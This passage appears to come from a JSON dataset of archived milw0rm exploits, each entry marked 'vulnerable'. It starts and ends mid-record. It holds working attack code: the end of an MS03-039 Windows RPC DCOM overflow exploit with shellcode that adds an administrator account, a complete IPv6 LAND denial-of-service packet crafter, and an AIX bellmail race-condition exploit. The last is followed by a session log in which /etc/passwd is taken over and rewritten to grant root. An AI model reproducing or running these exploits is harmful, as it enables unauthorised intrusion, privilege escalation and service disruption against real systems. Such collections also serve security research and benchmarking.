,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00};\n\n\n\nunsigned char request2[]={\n\n0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x5C,0x00,0x5C,0x00};\n\n\n\nunsigned char request3[]={\n\n0x5C,0x00\n\n,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00\n\n,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};\n\n\n\n//user=\"e\" pass=\"asd#321\"\n\nunsigned char 
sc_add_user[]=\n\n\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x3E\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x31\\x99\\x99\\x99\\xC3\\x21\\x95\\x69\"\n\n\"\\x64\\xE6\\x12\\x99\\x12\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\"\n\n\"\\x9A\\x6A\\x12\\xEF\\xE1\\x9A\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\"\n\n\"\\x74\\xCF\\xCE\\xC8\\x12\\xA6\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\"\n\n\"\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\"\n\n\"\\xBD\\x9A\\x5A\\x48\\x78\\x9A\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\"\n\n\"\\x5A\\x58\\x78\\x9B\\x9A\\x58\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\"\n\n\"\\x97\\x12\\x49\\xF3\\x9A\\xC0\\x71\\xBD\\x99\\x99\\x99\\xF1\\x66\\x66\\x66\\x99\"\n\n\"\\xF1\\x99\\x89\\x99\\x99\\xF3\\x9D\\x66\\xCE\\x6D\\x22\\x81\\x69\\x64\\xE6\\x10\"\n\n\"\\x9A\\x1A\\x5F\\x95\\xAA\\x59\\xC9\\xCF\\x66\\xCE\\x61\\xC9\\x66\\xCE\\x65\\xAA\"\n\n\"\\x59\\x35\\x1C\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\"\n\n\"\\x77\\xAA\\x59\\x5A\\x71\\xCA\\x66\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\"\n\n\"\\xD8\\xFD\\xFD\\xEB\\xFC\\xEA\\xEA\\x99\\xD1\\xFC\\xF8\\xE9\\xDA\\xEB\\xFC\\xF8\"\n\n\"\\xED\\xFC\\x99\\xCE\\xF0\\xF7\\xDC\\xE1\\xFC\\xFA\\x99\\xDC\\xE1\\xF0\\xED\\xC9\"\n\n\"\\xEB\\xF6\\xFA\\xFC\\xEA\\xEA\\x99\\xFA\\xF4\\xFD\\xB9\\xB6\\xFA\\xB9\\xF7\\xFC\"\n\n\"\\xED\\xB9\\xEC\\xEA\\xFC\\xEB\\xB9\\xFC\\xB9\\xF8\\xEA\\xFD\\xBA\\xAA\\xAB\\xA8\"\n\n\"\\xB9\\xB6\\xF8\\xFD\\xFD\\xB9\\xBF\\xBF\\xB9\\xF7\\xFC\\xED\\xB9\\xF5\\xF6\\xFA\"\n\n\"\\xF8\\xF5\\xFE\\xEB\\xF6\\xEC\\xE9\\xB9\\xF8\\xFD\\xF4\\xF0\\xF7\\xF0\\xEA\\xED\"\n\n\"\\xEB\\xF8\\xED\\xF6\\xEB\\xEA\\xB9\\xFC\\xB9\\xB6\\xF8\\xFD\\xFD\\x99\";\n\n#define\tsc_offset\t\t0x24\n\n#define\tsc_max\t\t\t0x208\n\n#define\tjmp_addr_offset\tsc_max+sc_offset+0x8\n\n#define\ttop_seh_offset\tjmp_addr_offset+0x4\n\n\n\nunsigned char 
sc[]=\n\n\"\\x31\\x00\\x32\\x00\\x37\\x00\\x2e\\x00\\x30\\x00\\x2e\\x00\"\n\n\"\\x30\\x00\\x2e\\x00\\x31\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\"\n\n\"\\x43\\x00\\x24\\x00\\x5c\\x00\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"\\xe9\\xf3\\xfd\\xff\\xff\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\";\n\n\n\nunsigned char request4[]={\n\n0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00\n\n,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C\n\n,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n};\n\n\n\nstruct\n\n{\n\n\tchar\t*os;\n\n\tDWORD\tdwTopSeh;\n\n\tchar\t*seh;\n\n\tDWORD\tdwJmpAddr;\n\n\tchar\t*jmp;\n\n}\n\ntargets[] =\n\n{\n\n\t{ \"2kEnSp4+MS03-026\", \n\n\t\t0x7c54144c,\n\n\t\t\"kernel32.dll v5.0.2195.6688\",\n\n\t\t0x77a1b496,\n\n\t\t\"OLEAUT32.dll v2.40.4522.0\"},\n\n\t{ \"2kEnSp3+SomeHotFixs+MS03-026\", \n\n\t\t0x77eda1f0,\n\n\t\t\"kernel32.dll v5.0.2195.6079\",\n\n\t\t0x77a1afa9,\n\n\t\t\"OLEAUT32.dll v2.40.4518.0\"}\n\n}, v;\n\nvoid main(int argc,char ** argv)\n\n{\n\n WSADATA WSAData;\n\n SOCKET sock;\n\n int len,len1;\n\n SOCKADDR_IN addr_in;\n\n short port=135;\n\n unsigned char buf1[0x1000];\n\n unsigned char buf2[0x1000];\n\n\tint\ti, iType;\n\n\n\n\tprintf( \"MS03-039 RPC DCOM long filename heap buffer overflow exp v1\\n\"\n\n\t\t\t\"Base on flashsky's MS03-026 exp\\n\"\n\n\t\t\t\"Code 
by ey4s\\n\"\n\n\t\t\t\"2003-09-16\\n\"\n\n\t\t\t\"Welcome to http://www.xfocus.net\\n\"\n\n\t\t\t\"Thanks to flashsky & benjurry & Dave Aitel\\n\"\n\n\t\t\t\"If success, target will add a user \\\"e\\\" and password is \\\"asd#321\\\"\\n\\n\");\n\n\n\n\tif(argc!=3)\n\n\t{\n\n\t\tprintf(\"Usage: %s \\n\", argv[0]);\n\n\t\tfor(i = 0; i < sizeof(targets)/sizeof(v); i++)\n\n\t\t\tprintf( \"<%d> %s\\n\"\n\n\t\t\t\t\t\" TopSeh=0x%.8x in %s\\n\"\n\n\t\t\t\t\t\" JmpAddr=0x%.8x in %s\\n\",\n\n\t\t\t\t\ti, targets[i].os,\n\n\t\t\t\t\ttargets[i].dwTopSeh, targets[i].seh,\n\n\t\t\t\t\ttargets[i].dwJmpAddr, targets[i].jmp);\n\n\t\treturn;\n\n\t}\n\n\n\n\tiType = atoi(argv[2]);\n\n\tif((iType<0) || iType > sizeof(targets)/sizeof(v))\n\n\t{\n\n\t\tprintf(\"[-] Wrong type.\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n\tmemcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));\n\n\tmemcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);\n\n\tmemcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);\n\n\tprintf(\"[+] Prepare shellcode completed.\\n\");\n\n\n\n if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)\n\n {\n\n printf(\"WSAStartup error.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n\n\n addr_in.sin_family=AF_INET;\n\n addr_in.sin_port=htons(port);\n\n addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);\n\n \n\n if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)\n\n {\n\n printf(\"Socket failed.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\n\n {\n\n printf(\"Connect failed.Error:%d\",WSAGetLastError());\n\n return;\n\n }\n\n\tprintf(\"[+] Connect to %s:135 success.\\n\", argv[1]);\n\n\n\n\tif(sizeof(sc_add_user) > sc_max)\n\n\t{\n\n\t\tprintf(\"[-] shellcode too long, exit.\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n \n\n len=sizeof(sc);\n\n memcpy(buf2,request1,sizeof(request1));\n\n len1=sizeof(request1);\n\n *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; 
//\u00bc\u00c6\u00cb\u00e3\u00ce\u00c4\u00bc\u00fe\u00c3\u00fb\u00cb\u00ab\u00d7\u00d6\u00bd\u00da\u00b3\u00a4\u00b6\u00c8\n\n *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//\u00bc\u00c6\u00cb\u00e3\u00ce\u00c4\u00bc\u00fe\u00c3\u00fb\u00cb\u00ab\u00d7\u00d6\u00bd\u00da\u00b3\u00a4\u00b6\u00c8\n\n memcpy(buf2+len1,request2,sizeof(request2));\n\n len1=len1+sizeof(request2);\n\n memcpy(buf2+len1,sc,sizeof(sc));\n\n len1=len1+sizeof(sc);\n\n memcpy(buf2+len1,request3,sizeof(request3));\n\n len1=len1+sizeof(request3);\n\n memcpy(buf2+len1,request4,sizeof(request4));\n\n len1=len1+sizeof(request4);\n\n *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;\n\n //\u00bc\u00c6\u00cb\u00e3\u00b8\u00f7\u00d6\u00d6\u00bd\u00e1\u00b9\u00b9\u00b5\u00c4\u00b3\u00a4\u00b6\u00c8\n\n *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; \n\n *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;\n\n\n\n len = send(sock,bindstr,sizeof(bindstr),0);\n\n\tif(len<=0)\n\n {\n\n printf(\"[-] Send failed.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n \telse\n\n\t\tprintf(\"[+] send %d bytes.\\n\", len);\n\n\t\n\n len=recv(sock,buf1,1000,0);\n\n\tif(len<=0)\n\n\t{\n\n\t\tprintf(\"[-] recv error:%d\\n\", GetLastError());\n\n\t\treturn;\n\n\t}\n\n\telse\n\n\t\tprintf(\"[+] recv %d bytes.\\n\", len);\n\n\n\n len = send(sock,buf2,len1,0);\n\n\tif(len<=0)\n\n {\n\n printf(\"[-] Send failed.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n\telse\n\n\t\tprintf(\"[+] send %d bytes.\\n\", len);\n\n len=recv(sock,buf1,1024,0);\n\n\tif(len<=0)\n\n\t{\n\n\t\tprintf(\"[+] Target crash or exploit success? 
:)\\n\");\n\n\t}\n\n\telse\n\n\t\tprintf(\"[-] recv %d bytes. Bad luck!\\n\", len);\n\n}\n\n\n\n\n\n\n\n// milw0rm.com [2003-09-16]", + "vulnerable": true + }, + { + "exploit_id": 1000, + "content": "//\n\n// Example usage: LandIpV6 \\Device\\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} \n\n//fe80::2a1:b0ff:fe08:8bcc 135\n\n//\n\n// Written by: Konrad Malewski.\n\n//\n\n\n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n///////////////////////////////////////////////////////////////////////////////\n\n///////////// from libnet /////////////\n\n/* ethernet addresses are 6 octets long */\n\n#define ETHER_ADDR_LEN 0x6\n\n\n\ntypedef unsigned char u_int8_t;\n\ntypedef unsigned short u_int16_t;\n\ntypedef unsigned int u_int32_t;\n\ntypedef unsigned __int64 u_int64_t;\n\n/*\n\n* Ethernet II header\n\n* Static header size: 14 bytes\n\n*/\n\nstruct libnet_ethernet_hdr\n\n{\n\nu_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */\n\nu_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */\n\nu_int16_t ether_type; /* protocol */\n\n};\n\n\n\nstruct libnet_in6_addr\n\n{\n\nunion\n\n{\n\nu_int8_t __u6_addr8[16];\n\nu_int16_t __u6_addr16[8];\n\nu_int32_t __u6_addr32[4];\n\n} __u6_addr; /* 128-bit IP6 address */\n\n};\n\n\n\n\n\n/*\n\n* IPv6 header\n\n* Internet Protocol, version 6\n\n* Static header size: 40 bytes\n\n*/\n\nstruct libnet_ipv6_hdr\n\n{\n\nu_int8_t ip_flags[4]; /* version, traffic class, flow label */\n\nu_int16_t ip_len; /* total length */\n\nu_int8_t ip_nh; /* next header */\n\nu_int8_t ip_hl; /* hop limit */\n\nstruct libnet_in6_addr ip_src, ip_dst; /* source and dest address */\n\n\n\n};\n\n\n\n/*\n\n* TCP header\n\n* Transmission Control Protocol\n\n* Static header size: 20 bytes\n\n*/\n\nstruct libnet_tcp_hdr\n\n{\n\nu_int16_t th_sport; /* source port */\n\nu_int16_t th_dport; /* destination port */\n\nu_int32_t th_seq; /* sequence number */\n\nu_int32_t th_ack; /* acknowledgement number */\n\nu_int8_t 
th_x2:4, /* (unused) */\n\nth_off:4; /* data offset */\n\n\n\nu_int8_t th_flags; /* control flags */\n\nu_int16_t th_win; /* window */\n\nu_int16_t th_sum; /* checksum */\n\nu_int16_t th_urp; /* urgent pointer */\n\n};\n\n\n\nint libnet_in_cksum(u_int16_t *addr, int len)\n\n{\n\nint sum;\n\nunion\n\n{\n\nu_int16_t s;\n\nu_int8_t b[2];\n\n}pad;\n\nsum = 0;\n\nwhile (len > 1)\n\n{\n\nsum += *addr++;\n\nlen -= 2;\n\n}\n\nif (len == 1)\n\n{\n\npad.b[0] = *(u_int8_t *)addr;\n\npad.b[1] = 0;\n\nsum += pad.s;\n\n}\n\nreturn (sum);\n\n}\n\n#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) \n\n& 0xffff))\n\n\n\n///////////////////////////////////////////////////////////////////////////////\n\n///////////////////////////////////////////////////////////////////////////////\n\nu_char packet[74];\n\nstruct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);\n\nstruct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);\n\nstruct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;\n\n\n\nu_char errbuf[1024];\n\npcap_t *pcap_handle;\n\n\n\n\n\nvoid usage(char* n)\n\n{\n\npcap_if_t * alldevs,*d;\n\nint i=1;\n\nfprintf(stdout,\"Usage:\\n\"\n\n\"\\t %s \\n\",n);\n\n\n\nif (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)\n\n{\n\nfprintf( stderr, \"Error in pcap_findalldevs ():%s\\n\" ,errbuf);\n\nexit(EXIT_FAILURE);\n\n}\n\nprintf(\"Avaliable adapters: \\n\");\n\nd = alldevs;\n\nwhile (d!=NULL)\n\n{\n\nprintf(\"\\t%d) %s\\n\\t\\t%s\\n\",i++,d->name,d->description);\n\nd = d->next;\n\n}\n\npcap_freealldevs (alldevs);\n\n}\n\n///////////////////////////////////////////////////////////////////////////////\n\nint main(int argc, char* argv[])\n\n{\n\nif ( argc<4 )\n\n{\n\nusage(argv[0]);\n\nreturn EXIT_FAILURE;\n\n}\n\n\n\nint retVal;\n\nstruct addrinfo hints,*addrinfo;\n\n\n\nZeroMemory(&hints,sizeof(hints));\n\n\n\nWSADATA wsaData;\n\nif ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )\n\n{\n\nfprintf( stderr, \"Error in 
WSAStartup():%d\\n\",WSAGetLastError());\n\nreturn EXIT_FAILURE;\n\n}\n\n//\n\n// Get MAC address of remote host (assume link local IpV6 address)\n\n//\n\n\n\nhints.ai_family = PF_INET6;\n\nhints.ai_socktype = SOCK_STREAM;\n\nhints.ai_protocol = IPPROTO_TCP;\n\nhints.ai_flags = AI_PASSIVE;\n\n\n\nretVal = getaddrinfo(argv[2],0, &hints, &addrinfo);\n\nif ( retVal!=0 )\n\n{\n\nWSACleanup();\n\nfprintf( stderr, \"Error in getaddrinfo():%d\\n\",WSAGetLastError());\n\nexit(EXIT_FAILURE);\n\n}\n\n\n\n//\n\n// Open WinPCap adapter\n\n//\n\nif ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, \n\n100, (char*)errbuf)) == NULL )\n\n{\n\nfreeaddrinfo(addrinfo);\n\nWSACleanup();\n\nfprintf(stderr, \"Error opening device: %s\\n\",argv[1]);\n\nreturn EXIT_FAILURE;\n\n}\n\n\n\nZeroMemory(packet,sizeof(packet));\n\nstruct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;\n\n\n\n// fill ethernet header\n\neth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like \n\n00:something;\n\neth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];\n\neth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];\n\neth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];\n\neth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];\n\neth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];\n\neth_hdr->ether_type = 0xdd86;\n\n\n\n\n\n// fill IP header\n\n// source ip == destination ip\n\n\n\nmemcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));\n\n\n\nmemcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));\n\nip6_hdr->ip_hl = 255;\n\nip6_hdr->ip_nh = IPPROTO_TCP;\n\nip6_hdr->ip_len = htons (20);\n\nip6_hdr->ip_flags[0] = 0x06 << 4;\n\nsrand((unsigned int) time(0));\n\n// fill tcp header\n\ntcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source 
\n\nport equal to destination\n\ntcp_hdr->th_seq = rand();\n\ntcp_hdr->th_ack = rand();\n\ntcp_hdr->th_off = htons(5);\n\ntcp_hdr->th_win = rand();\n\ntcp_hdr->th_sum = 0;\n\ntcp_hdr->th_urp = htons(10);\n\ntcp_hdr->th_off = 5;\n\ntcp_hdr->th_flags = 2;\n\n// calculate tcp checksum\n\nint chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);\n\nchsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));\n\nchsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct \n\nlibnet_tcp_hdr));\n\ntcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);\n\n// send data to wire\n\nretVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));\n\nif ( retVal == -1 )\n\n{\n\nfprintf(stderr,\"Error writing packet to wire!!\\n\");\n\n}\n\n//\n\n// close adapter, free mem.. etc..\n\n//\n\npcap_close(pcap_handle);\n\nfreeaddrinfo(addrinfo);\n\nWSACleanup();\n\nreturn EXIT_SUCCESS;\n\n}\n\n\n\n// milw0rm.com [2005-05-17]", + "vulnerable": true + }, + { + "exploit_id": 1001, + "content": "-bash-2.05b$\n\n-bash-2.05b$ cat x_aix5_bellmail.pl\n\n#!/usr/bin/perl\n\n# FileName: x_aix5_bellmail.pl\n\n# Exploit \"Race condition vulnerability (BUGTRAQ ID: 8805)\" of /usr/bin/bellmail\n\n# command on Aix5 to change any file owner to current user.\n\n#\n\n#Usage : x_aix5_bellmail.pl aim_file\n\n# aim_file : then file wich you want to chown to you.\n\n# Note : Maybe you should run more than one to \"Race condition\".\n\n# The file named \"x_bell.sh\" can help you to use this exp.\n\n# You should type \"w\" \"Enter\" then \"q\" \"Enter\" key on keyboard\n\n# as fast as you can when bellmail prompt \"?\" appear.\n\n#\n\n# Author : watercloud@xfocus.org\n\n# XFOCUS Team \n\n# http://www.xfocus.net (CN)\n\n# http://www.xfocus.org (EN)\n\n#\n\n# Date : 2004-6-6\n\n# Tested : on Aix5.1.\n\n# Addition: IBM had offered a patch named \"IY25661\" for it.\n\n# Announce: use as your owner 
risk!\n\n\n\n$CMD=\"/usr/bin/bellmail\";\n\n$MBOX=\"$ENV{HOME}/mbox\";\n\n$TMPFILE=\"/tmp/.xbellm.tmp\";\n\n\n\n$AIM_FILE = shift @ARGV ;\n\n$FORK_NUM = 1000;\n\n\n\ndie \"AIM FILE \\\"$AIM_FILE\\\" not exist.\\n\" if ! -e $AIM_FILE;\n\n\n\nunlink $MBOX;\n\nsystem \"echo abc > $TMPFILE\";\n\nsystem \"$CMD $ENV{LOGIN} < $TMPFILE\";\n\nunlink $TMPFILE;\n\n\n\n$ret=`ls -l $AIM_FILE\"`;\n\nprint \"Before: $ret\";\n\n\n\nif( fork()==0 )\n\n{\n\n &deamon($FORK_NUM);\n\n exit 0 ;\n\n}\n\nsleep( (rand()*100)%4);\n\nexec $CMD;\n\n\n\n$ret=`ls -l $AIM_FILE\"`;\n\nprint \"Now: $ret\";\n\n\n\nsub deamon {\n\n $num = shift || 1;\n\n for($i=0;$i<$num;$i++) {\n\n &do_real() if fork()==0;\n\n }\n\n}\n\nsub do_real {\n\n if(-e $MBOX) {\n\n unlink $MBOX ;\n\n symlink \"$AIM_FILE\",$MBOX;\n\n }\n\n exit 0;\n\n}\n\n#EOF\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n-bash-2.05b$\n\n-bash-2.05b$ cat x_bellmail.sh\n\n#!/bin/sh\n\n#File:x_bellmail.sh\n\n#The assistant of x_aix5_bellmail.pl\n\n#Author : watercloud@xfocus.org\n\n#Date :2004-6-6\n\n#\n\n\n\nX_BELL_PL=\"./x_aix5_bellmail.pl\"\n\nAIM=$1\n\n\n\nif [ $# ne 1 ] ;then\n\n echo \"Need a aim file name as argv.\"\n\n exit 1;\n\nfi\n\n\n\nif [ ! -e \"$1\" ];then\n\n echo \"$1 not exist!\"\n\n exit 1\n\nfi\n\nif [ ! 
-x \"$X_BELL_PL\" ];then\n\n echo \"can not exec $X_BELL_PL\"\n\n exit 1\n\nfi\n\n\n\nret=`ls -l $AIM`\n\necho $ret; echo\n\nfuser=`echo $ret |awk '{print $3}'`\n\nwhile [ \"$fuser\" != \"$LOGIN\" ]\n\ndo\n\n $X_BELL_PL $AIM\n\n ret=`ls -l $AIM`\n\n echo $ret;echo\n\n fuser=`echo $ret |awk '{print $3}'`\n\ndone\n\necho $ret; echo\n\n#EOF\n\n\n\n\n\n\n\n\n\n-bash-2.05b$ id\n\nuid=201(cloud) gid=1(staff)\n\n-bash-2.05b$\n\n-bash-2.05b$ oslevel\n\n5.1.0.0\n\n-bash-2.05b$ oslevel -r\n\n5100-01\n\n-bash-2.05b$ ls -l /usr/bin/bellmail\n\n-r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail\n\n-bash-2.05b$ ls -l /etc/passwd\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n-bash-2.05b$ cp /etc/passwd /tmp/\n\n\n\n\n\n-bash-2.05b$ ./x_bellmail.sh /etc/passwd\n\n./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:30 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:35 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:40 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:43 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? 
q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nw\n\nFrom cloud Sun Jun 6 08:49:48 2004\n\nabc\n\n\n\n? From cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? w\n\nbellmail: cannot append to /home/cloud/mbox\n\n? w\n\nbellmail: cannot append to /home/cloud/mbox\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:56 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:50:01 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd\n\n\n\n-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd\n\n\n\n\n\n\n\n\n\n\n\n\n\n-bash-2.05b$ cat /etc/passwd\n\nroot:!:0:0::/:/usr/bin/ksh\n\ndaemon:!:1:1::/etc:\n\nbin:!:2:2::/bin:\n\nsys:!:3:3::/usr/sys:\n\nadm:!:4:4::/var/adm:\n\nuucp:!:5:5::/usr/lib/uucp:\n\nguest:!:100:100::/home/guest:\n\nnobody:!:4294967294:4294967294::/:\n\nlpd:!:9:4294967294::/:\n\nlp:*:11:11::/var/spool/lp:/bin/false\n\ninvscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n\nnuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n\nsnapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd\n\nimnadm:*:188:188::/home/imnadm:/usr/bin/ksh\n\ncloud:!:201:1::/home/cloud:/usr/local/bin/bash\n\n\n\n\n\n\n\n-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd\n\n\n\n\n\n-bash-2.05b$ su cloud\n\ncloud's Password:\n\n3004-502 Cannot get \"LOGNAME\" 